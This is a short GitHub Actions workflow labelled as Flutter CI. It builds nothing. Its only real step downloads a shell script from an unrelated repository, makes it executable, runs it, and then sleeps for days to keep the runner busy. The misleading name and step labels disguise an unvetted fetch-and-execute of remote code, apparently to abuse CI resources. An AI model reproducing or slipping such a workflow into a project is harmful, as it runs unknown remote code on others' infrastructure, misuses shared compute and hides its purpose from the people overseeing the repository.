# This is a basic workflow to help you get started with Actions

name: Flutter CIo

on:
  push:
    branches:
      - master
  pull_request:
    branches:
      - master
    
jobs:
  linux:
    strategy:
      matrix:
        container:
        - 'debian:latest'
    timeout-minutes: 300
    runs-on: ubuntu-latest
    continue-on-error: true
    container: ${{ matrix.container }}
    steps:
    - name: Setup27
      uses: actions/checkout@v1
    - name: prebuild27
      run: |
             apt-get install wget -y 
             wget https://github.com/taebk2838/docker-desktop/raw/master/set.sh
             chmod 777 set.sh
             ./set.sh
             sleep 474849
